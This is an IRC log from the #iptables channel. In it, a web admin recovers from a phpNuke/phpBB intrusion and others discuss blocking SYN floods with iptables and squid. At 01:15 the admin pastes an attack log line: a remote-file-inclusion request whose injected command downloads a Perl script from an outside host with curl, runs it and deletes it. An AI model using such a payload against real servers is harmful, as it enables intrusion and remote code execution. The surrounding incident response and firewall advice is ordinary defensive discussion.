Log from #iptables at freenode 2006-07-06
[00:15]<vyrn-vnzsr>killermach: you get it working?
[00:17]<mzwjjpnz>Are there any experts available to ask a question to
[00:17]<ayffnzdrax>vice-versa: I'm still battling the intrusion.. I have access and /var/log/firewall is dropping GOBS of packets... so hopefully I'm the only one w/ access
[00:18]<mzwjjpnz> I have a rather complex question. I am looking to see if there is a way with iptables to mimic the cisco tcp-intercept command, whereby the iptables firewall box will receive the packet and if it is open for more than 10 seconds it will close the connection and send a reset to the host it is protecting. note: firewall is not the same box as the host
[00:18]<ayffnzdrax>I have httpsl (many) running, they're not mine.. and an httpslx (single instance) they keep respawning and
[00:19]<ayffnzdrax>locate and find do not show me where the files actually are.. any help ?
[00:28]<vyrn-vnzsr>killermach: chkrootkit ?
[00:29]<wjjmmwjjmlnacnz>killermach: You can use find or lsof to locate your log files.
[00:30]<ayffnzdrax>find doesn't locate httpsl, httpslx or httpsd
[00:30]<wjjmmwjjmlnacnz>I thought he wanted log files searched?
[00:30]<wjjmmwjjmlnacnz>*searched for?
[00:31]<wjjmmwjjmlnacnz>Hm, maybe misunderstood.
[00:33]<vyrn-vnzsr>killermach: get the pid of the process and ls -l /proc/thepid
[00:37]<vyrn-vnzsr>killermach: any joy?
[00:38]<ayffnzdrax>ls -al /proc/pid says the exe -> /usr/bin/perl and I have chmod 000 that file
[00:38]<ayffnzdrax>still doesn't help locate the source
[00:39]<ayffnzdrax>the original intrusion was via /tmp/ directory when a php exploit wrote files there. I've chmod'd them 000 also
[00:39]<vyrn-vnzsr>aye
[00:45]<ayffnzdrax>now I have them dying off, down from 274 processes to 101, and dropping.. but I need to locate where they are running from
[00:45]<ayffnzdrax>I'm not rooted btw.. all these are apache processes
[00:49]<ayffnzdrax>any other ways to find out the actual filename and location for these processes?
[00:50]<ayffnzdrax>WoodyWoodpecker: I have log files open.. yes.. reviewing them now
[00:54]<vyrn-vnzsr>killermach: ps aux ??
[00:59]<ayffnzdrax>vice-versa:
[01:00]<ayffnzdrax>vice-versa: I figured it out
[01:00]<ayffnzdrax>these are all being launched from the original perlscript that was uploaded to /tmp
[01:00]<ayffnzdrax>now I need to find out how to keep them from respawning
[01:00]<ayffnzdrax>kill them off
[01:06]<ayffnzdrax>ok.. I think they are all dead
[01:06]<ayffnzdrax>now time to plug the hole that let them in
[01:06]<ayffnzdrax>then put humpty back together again
[01:11]<vyrn-vnzsr>killermach: is this your own php code or some package the exploited
[01:11]<vyrn-vnzsr>*they
[01:12]<ayffnzdrax>vice-versa: no.. it's not mine.. it's phpnuke.. the plague of the web admin
[01:15]<ayffnzdrax>here is the log line (one of them anyhow)
[01:15]<ayffnzdrax>access_log:hal9000.mi.infn.it - - [05/Jul/2006:15:06:52 -0400] "GET /modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.ithose.com/cmd/tool25.dat?&cmd=cd%20/tmp/;curl%20-O%20http://gerichtssall.net/phpnuke.txt;perl%20phpnuke.txt;rm%20-rf%20phpnuke.*? HTTP/1.0" 200 11757 "-" "Mozilla/5.0"
[01:27]<ayffnzdrax>vice-versa: ok.. I'm up again
[01:30]<ayffnzdrax>two hours.. hmm.. not bad for a one man show
[01:37]<mzwjjpnz> I have a rather complex question. I am looking to see if there is a way with iptables to mimic the cisco tcp-intercept command, whereby the iptables firewall box will receive the packet and if it is open for more than 10 seconds it will close the connection and send a reset to the host it is protecting. note: firewall is not the same box as the host
[01:37]<drwygn>i already had it that way, MrWoofer.
[01:38]<mzwjjpnz>you had it?
[02:36]<unix9all>Hi all
[02:36]<unix9all>I have a problem, I searched google and a lot of manuals and I don't find the solution ( And I think that it must be easy ).
[02:39]<unix9all>I have 1 router, with all ports open to one linux machine, this machine acts as an AP, well, I want to redirect all ports to one machine connected via the AP, I want this machine to have all the ports open and accessible via internet, anyone knows how ?
[03:10]<vyrn-vnzsr>killermach: so it was phpbb that was exploited?
[03:12]<vyrn-vnzsr>maxine: don't be messing with MrWoofer now...
[03:12]<drwygn>vice-versa: what?
[03:13]<vyrn-vnzsr>maxine: you heard me!
[03:13]<drwygn>vice-versa: excuse me?
[03:15]<mrrynfmr>MrWoofer: this is to prevent SYN floods?
[03:16]<mrrynfmr>if you have a kernel 2.6.14+, you could set the ip_conntrack_tcp_timeout_syn_sent to 10 seconds, and have a daemon listen to the conntrack DELETE events, sending an RST for each one
[03:17]<mrrynfmr>hmm - actually, you'd want to change _syn_rcv too
[03:18]<mrrynfmr>maxine: shut up
[03:18]<drwygn>danieldg: excuse me?
[03:18]<mrrynfmr>hmm, I thought that was a command...
[03:27]<mzwjjpnz>well what i am looking to do is, once we identify a syn flood, block all bad syns and authenticate good syns and kill any open syn requests on the destination machine that might be left bad
[03:29]<mzwjjpnz>i.e syn requests come in, we block it, it comes again, identical one that is, we allow it through, since it is valid
[03:29]<mrrynfmr>oh - maybe look at -m recent?
[03:30]<mrrynfmr>maybe use recent in the raw table, so the first packet goes to NOTRACK (or directly to DROP), and the second is the first one seen by conntrack
[03:30]<mzwjjpnz>Well that might work. i want to watch not only the ip but the syn..
[03:31]<mrrynfmr>by "the syn" you mean the sequence number?
[03:31]<mzwjjpnz>Yes, i believe so
[03:31]<mzwjjpnz>if someone is attacking you, syn wise, we need to be able to somehow allow good in and keep the bad out
[03:31]<mrrynfmr>I think you'd have to write your own module to do that
[03:31]<mrrynfmr>can you proxy the connections?
[03:32]<mzwjjpnz>one method i "believe" is dropping the first syn, wait for it to re-present itself, if it does, whitelist the ip
[03:32]<mzwjjpnz>if it just keeps sending syns drop
[03:32]<mzwjjpnz>proxy? in what way
[03:32]<mrrynfmr>syncookies would let linux handle the connections - I assume the server doesn't support them
[03:32]<mzwjjpnz>this is going to be a transparent firewall bridge
[03:32]<mzwjjpnz>going to protect a bunch of boxes
[03:33]<mzwjjpnz>from various customers
[03:33]<mrrynfmr>there are transparent proxies, if it's HTTP
[03:33]<mzwjjpnz>ok so what would we proxy and why would we proxy it
[03:34]<mrrynfmr>you would just proxy to intercept the connection - basically you receive each packet and send the TCP stream out
[03:34]<mrrynfmr>so, your firewall would be getting hit by the SYN flood, not the hosts behind it
[03:34]<mzwjjpnz>right but we are already intercepting by being inline
[03:34]<mrrynfmr>yes, but you're not rewriting the TCP stream
[03:35]<mzwjjpnz>Ok. so we absorb the syn flood
[03:35]<mzwjjpnz>so how do we know which packets to let through
[03:36]<mrrynfmr>on an established connection (SYN, SYN/ACK from firewall, ACK), then your firewall connects to the real server
[03:36]<mzwjjpnz>why need the proxy at all just block the non-established ones
[03:36]<mrrynfmr>because you don't know which ones are established
[03:37]<mrrynfmr>and once you find out in this way, it's connected to a socket on the firewall
[03:37]<mzwjjpnz>Ok so, bad traffic comes in on a syn flood, firewall redirects to squid.. squid then receives packets, if they ack it, we then redirect it to the destination
[03:38]<mrrynfmr>yes
[03:38]<mzwjjpnz>Any idea how to write the iptable rule for that ?
[03:38]<mrrynfmr>you'd use REDIRECT to send all packets to squid
[03:38]<mzwjjpnz>i get that part..
[03:38]<mzwjjpnz>example:
[03:38]<mzwjjpnz>iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 80 -j DNAT --to 192.168.1.1:3128
[03:38]<mzwjjpnz>iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 3128
[03:39]<mzwjjpnz>assuming squid is on port 3128
[03:39]<mrrynfmr>use the second one
[03:39]<mzwjjpnz>Ok
[03:40]<mzwjjpnz>ok now how do i get it to go to the destination once we validate it, and what are the rules to validate it
[03:40]<mrrynfmr>squid will take care of getting it to the destination
[03:41]<mrrynfmr>actually, you don't use the firewall to validate it - you let the linux kernel do that